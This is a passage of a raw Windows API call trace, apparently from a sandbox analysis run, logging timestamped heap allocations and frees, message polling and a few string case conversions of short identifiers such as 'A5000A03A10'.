hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.663] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0267.664] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.664] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.665] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.667] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.668] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.669] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.670] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: 